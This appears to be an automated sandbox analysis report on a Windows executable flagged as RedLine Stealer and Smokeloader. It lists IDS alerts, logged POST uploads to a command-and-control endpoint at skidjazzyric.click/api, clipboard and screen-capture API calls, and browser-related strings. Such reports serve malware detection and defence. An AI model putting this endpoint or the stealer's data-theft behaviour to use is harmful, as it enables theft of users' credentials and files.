            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.96.1:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: skidjazzyric.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6CP9VWM5QP1IM68YURUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: skidjazzyric.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PL5DDJ64YC5FJAOGWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: skidjazzyric.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R4D3TTVIKNLEDKWYQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20231Host: skidjazzyric.click
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: skidjazzyric.click
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
            Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440924101.000000000076D000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/
            Source: uU6IvUPN39.exe, 00000000.00000003.1452952071.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1452838783.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1452979206.0000000002F1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/&_
            Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/E
            Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/X
            Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440748963.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/api
            Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/apij;
            Source: uU6IvUPN39.exe, 00000000.00000003.1481330230.0000000002F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click:443/apiicrosoft
            Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: uU6IvUPN39.exe, 00000000.00000003.1468956506.0000000002F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
            Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
            Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004367F0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004367F0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,0_2_00436980

            System Summary

            barindex
            Source: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043B8700_2_0043B870
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004088800_2_00408880
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00421E700_2_00421E70
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004157200_2_00415720
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0040CFEC0_2_0040CFEC
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004198400_2_00419840
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004068500_2_00406850
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004278600_2_00427860
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004270700_2_00427070
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004060000_2_00406000
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043080E0_2_0043080E
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043F8200_2_0043F820
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041D0C00_2_0041D0C0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004418A00_2_004418A0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041194F0_2_0041194F
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043F1500_2_0043F150
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0042B1700_2_0042B170
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004039000_2_00403900
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004251000_2_00425100
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004399230_2_00439923
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004271330_2_00427133
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004339300_2_00433930
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004121DB0_2_004121DB
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0042A9F70_2_0042A9F7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0040E9B00_2_0040E9B0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041825B0_2_0041825B
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0042EA620_2_0042EA62
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0040CA620_2_0040CA62
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00442A600_2_00442A60
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041DAD00_2_0041DAD0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00429ADE0_2_00429ADE
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00425AF00_2_00425AF0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004092A00_2_004092A0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00405AB00_2_00405AB0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0040B2B00_2_0040B2B0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004042B00_2_004042B0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043CB400_2_0043CB40
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0042EB5F0_2_0042EB5F
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004083600_2_00408360
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00428B670_2_00428B67
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00437B690_2_00437B69
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00402B200_2_00402B20
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00441B200_2_00441B20
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00432B240_2_00432B24
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004063C00_2_004063C0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0042DBF00_2_0042DBF0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004223800_2_00422380
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041BBA00_2_0041BBA0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0042BBA00_2_0042BBA0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0042EBA10_2_0042EBA1
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0042EBB30_2_0042EBB3
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00441BB00_2_00441BB0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00441C400_2_00441C40
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004424700_2_00442470
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00426C760_2_00426C76
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041D4000_2_0041D400
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041C4000_2_0041C400
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004174050_2_00417405
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00414C200_2_00414C20
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004324260_2_00432426
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004284370_2_00428437
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043443D0_2_0043443D
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004354C40_2_004354C4
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00434CEF0_2_00434CEF
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043A4EF0_2_0043A4EF
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004374AB0_2_004374AB
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041DCB00_2_0041DCB0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043ACB00_2_0043ACB0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0042FCBC0_2_0042FCBC
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0040D5450_2_0040D545
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00425D6A0_2_00425D6A
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00435D130_2_00435D13
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00442D200_2_00442D20
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043CD270_2_0043CD27
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00420D900_2_00420D90
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0043C5A00_2_0043C5A0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004366100_2_00436610
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004076200_2_00407620
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0040AE300_2_0040AE30
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041F6D00_2_0041F6D0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00416ED00_2_00416ED0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041BEE10_2_0041BEE1
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00402EF00_2_00402EF0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004186FC0_2_004186FC
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00423EFF0_2_00423EFF
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00431E8E0_2_00431E8E
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041A6900_2_0041A690
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0041AF240_2_0041AF24
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00427F300_2_00427F30
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0040DFE20_2_0040DFE2
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004257E00_2_004257E0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00429FE40_2_00429FE4
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004097900_2_00409790
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_004427B00_2_004427B0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_00441FB00_2_00441FB0
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0213D2530_2_0213D253
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0213E2490_2_0213E249
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021362670_2_02136267
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0215A3050_2_0215A305
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0214D3270_2_0214D327
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0216F3B70_2_0216F3B7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021573B20_2_021573B2
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021720170_2_02172017
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0213B0970_2_0213B097
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021560B70_2_021560B7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021520D70_2_021520D7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021620F50_2_021620F5
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021331570_2_02133157
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0214C1480_2_0214C148
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021541660_2_02154166
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021581970_2_02158197
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0214B18B0_2_0214B18B
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021366270_2_02136627
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0214D6670_2_0214D667
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0214C6670_2_0214C667
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0216268D0_2_0216268D
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021646A40_2_021646A4
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021726D70_2_021726D7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021677120_2_02167712
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0216572B0_2_0216572B
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0216A7560_2_0216A756
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0213D7AC0_2_0213D7AC
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021424420_2_02142442
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021484C20_2_021484C2
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021345170_2_02134517
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021395070_2_02139507
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021385C70_2_021385C7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021525E70_2_021525E7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02172A170_2_02172A17
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02160A750_2_02160A75
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0216FA870_2_0216FA87
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02136AB70_2_02136AB7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02149AA70_2_02149AA7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0216BAD70_2_0216BAD7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02147AE40_2_02147AE4
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02138AE70_2_02138AE7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02133B670_2_02133B67
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02163B970_2_02163B97
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02169B8A0_2_02169B8A
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02141BB60_2_02141BB6
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0216C8070_2_0216C807
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021668770_2_02166877
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021378870_2_02137887
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0214A8F70_2_0214A8F7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0214F9370_2_0214F937
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_021399F70_2_021399F7
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0215EE1A0_2_0215EE1A
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0215BE070_2_0215BE07
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0215EE080_2_0215EE08
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_0215DE570_2_0215DE57
            Source: C:\Users\user\Desktop\uU6IvUPN39.exeCode function: 0_2_02144E870_2_02144E87
